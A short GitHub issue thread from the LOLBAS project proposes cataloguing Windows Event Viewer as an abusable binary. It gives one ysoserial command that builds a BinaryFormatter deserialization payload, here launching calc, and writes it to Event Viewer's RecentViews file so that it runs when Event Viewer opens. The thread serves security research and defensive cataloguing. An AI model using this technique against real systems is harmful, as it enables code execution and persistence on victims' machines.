### ISSUE TITLE
Investigate adding Windows Event Viewer

### ISSUE THREAD

**Issue by ConsciousHacker** [LOLBAS-Project/LOLBAS#208]
Payload generation command below.

`ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c calc > %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews`

[Source](https://twitter.com/orange_8361/status/1518970259868626944)

**Comment by wietze** [comment]
see #252, would you mind reviewing @ConsciousHacker ?
